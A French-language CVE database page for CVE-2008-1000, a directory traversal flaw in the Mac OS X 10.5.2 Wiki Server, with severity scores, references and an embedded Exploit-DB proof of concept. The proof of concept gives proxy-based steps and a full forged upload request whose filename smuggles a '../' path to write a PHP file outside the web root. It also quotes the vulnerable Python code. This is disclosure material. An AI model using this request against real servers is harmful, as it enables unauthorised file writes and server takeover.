CVE-2008-1000
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Descriptions du CVE
Directory traversal vulnerability in ContentServer.py in the Wiki Server in Apple Mac OS X 10.5.2 (aka Leopard) allows remote authenticated users to write arbitrary files via ".." sequences in file attachments.
Informations du CVE
Faiblesses connexes
| Nom de la faiblesse | Source | |
|---|---|---|
| Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory. |
Métriques
| Métriques | Score | Gravité | CVSS Vecteur | Source |
|---|---|---|---|---|
| V2 | 8.5 | AV:N/AC:M/Au:S/C:C/I:C/A:C | nvd@nist.gov |
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Informations sur l'Exploit
Exploit Database EDB-ID : 31412
Date de publication : 2008-03-16 23h00 +00:00
Auteur : Rodrigo Carvalho
EDB Vérifié : Yes
source: https://www.securityfocus.com/bid/28278/info
Apple Mac OS X Server Wiki Server is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data.
Exploiting this issue allows an attacker to access arbitrary files outside of the application's document root directory. This can expose sensitive information that could help the attacker launch further attacks.
Note that attackers must be registered wiki users to exploit this issue.
Wiki Server from Mac OS X Server 10.5 is vulnerable.
Next, we show a Proof of Concept (PoC) attack to the Leopard's Wiki
Server. It creates a file 'popote.php' at '/tmp/[xxxxx]/' where
'[xxxxx]' are random hexa characters assigned to the file, as we have
said. You can write on all the folders where user '_teamsserver', the
user running the Wiki Server, has permissions.
For example, to reproduce the attack using Paros proxy [3], follow these
steps:
- Check the web server is up.
- Check you have a system user/password in the system, for example
guest, and the log in.
- Start editing a new post in your blog.
- Start Paros proxy, go to Trap tab and enable Trap requests checkbox.
- Start uploading your preferred file, for example popote.php.
- In Paros, press Continue until you find the POST request.
- Append '../../../../../../..' at the beginning of 'popote.php' plus
your wished path, for example '/tmp/'.
- Press Continue a couple of times to send the request.
- If user '_teamsserver' has permissions on the wished folder, you will
write file 'popote.php' inside subfolder '[xxxxx]', where [xxxxx] are
hash/random hexa characters that depend on the file.
There are several strategies that can be used in combination with a
path traversal to gain complete control of the victim's server, although
we will not discuss them here.
An example forged request follows:
/-----------
POST http://192.168.xxx.xxx/users/guest/weblog/3f081/attachments HTTP/1.0
User-Agent: Opera/9.24 (Macintosh; Intel Mac OS X; U; en) Paros/3.2.13
Host: 192.168.xxx.xxx
Accept: text/html, application/xml;q=0.9, application/xhtml+xml,
image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language:
en,ja;q=0.9,fr;q=0.8,de;q=0.7,es;q=0.6,it;q=0.5,nl;q=0.4,sv;q=0.3,nb;q=0.2,da;q=0.1,fi;q=0.1,pt;q=0.1,zh-CN;q=0.1,zh-TW;q=0.1,ko;q=0.1,ru;q=0.1,en;q=0.1
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: identity, *;q=0
Referer: http://192.168.xxx.xxx/users/guest/weblog/3f081/
Cookie: cookies=1; acl_cache=3; recentTags=add tags here;
SQMSESSID=fe79c978b66bf3bf6d0c433abd6008a6;
sessionID=75706E3C-FA5A-4535-85EA-0D69812D21D3; utcOffset=-3; uploadID=57904
Cookie2: $Version=1
Proxy-Connection: close
Content-length: 426
Content-Type: multipart/form-data; boundary=----------YN7xkbcuNgNx21psG30p21
------------YN7xkbcuNgNx21psG30p21
Content-Disposition: form-data; name="Attachment";
filename="../../../../../../../tmp/popote.php"
Content-Type: application/octet-stream
<? phphinfo(); ?>
------------YN7xkbcuNgNx21psG30p21
Content-Disposition: form-data; name="ok_button"
Attach
------------YN7xkbcuNgNx21psG30p21
Content-Disposition: form-data; name="upload_id"
57904
------------YN7xkbcuNgNx21psG30p21--
-----------/
The vulnerable code is located at
'/usr/share/wikid/lib/python/apple_wlt/ContentServer.py':
/-----------
def uploadFileCallback(self, result):
filename, filetype, aFile = result[1][self.type][0]
filename = filename.decode('utf-8')
filename = filename.split('\\')[-1] # IE sends the whole path,
including your local username.
extension = filename.split('.')[-1]
oldFilename = filename
uploadType = os.path.split(self.fullpath)[-1]
if uploadType == "images":
filename = SettingsManager.findGoodName() + '.' + extension
logging.debug("beginning file upload: %s" % filename)
isImage = filenameIsImage(filename)
newPath = ImageUtilities.findUniqueFileName(os.path.join(self.fullpath,
filename), isImage = (not uploadType == 'attachments'))
newFilename = os.path.basename(newPath)
if uploadType == "attachments":
newParentFolder = os.path.dirname(newPath)
os.mkdir(newParentFolder)
newFilename = os.path.join(os.path.basename(newParentFolder), filename)
[...]
-----------/
The hash/random hexa characters used for the attachment subfolder
are generated by code at
'/usr/share/wikid/lib/python/apple_utilities/ImageUtilities.py':
/-----------
def findUniqueFileName(inPath, isImage = True):
"""Uniqueifies a file name, to avoid duplicates in images and
attachments"""
filename = os.path.basename(inPath)
base, extension = os.path.splitext(filename)
parent = os.path.dirname(inPath)
aPath = ''
mungedName = SettingsManager.findGoodName()
if not isImage:
#attachment, so make the minged name a subdirectory and put the file
in that
aPath = os.path.join(parent, mungedName, filename)
while os.path.exists(aPath):
mungedName = SettingsManager.findGoodName(mungedName)
aPath = os.path.join(parent, mungedName, filename)
else:
aPath = os.path.join(parent, mungedName + extension)
while os.path.exists(aPath):
mungedName = SettingsManager.findGoodName(mungedName)
aPath = os.path.join(parent, mungedName + extension)
return aPath
-----------/
Products Mentioned
Configuraton 0
Apple>>Mac_os_x >> Version 10.5.2
- Apple>>Mac_os_x >> Version 10.5.2 (Open CPE detail)
Apple>>Mac_os_x_server >> Version 10.5.2
- Apple>>Mac_os_x_server >> Version 10.5.2 (Open CPE detail)
Références
http://www.securityfocus.com/archive/1/489786/100/0/threaded
Tags : mailing-list, x_refsource_BUGTRAQ
Tags : mailing-list, x_refsource_BUGTRAQ
http://lists.apple.com/archives/security-announce/2008/Mar/msg00001.html
Tags : vendor-advisory, x_refsource_APPLE
Tags : vendor-advisory, x_refsource_APPLE
http://www.coresecurity.com/index.php5?module=ContentMod&action=item&id=2189
Tags : x_refsource_MISC
Tags : x_refsource_MISC
Les informations affichées sur CVE Find proviennent de plusieurs sources de référence rigoureusement sélectionnées. Les données CVE sont fournies par MITRE Corporation et la National Vulnerability Database (NVD). Le catalogue des vulnérabilités activement exploitées (KEV) provient de la Cybersecurity and Infrastructure Security Agency (CISA), tandis que les scores EPSS sont issus de FIRST.org. Enfin, les données relatives aux faiblesses logicielles (CWE) et aux schémas d'attaque courants (CAPEC)
sont maintenues par MITRE Corporation, et les informations sur les configurations
logicielles et matérielles (CPE) proviennent du NVD.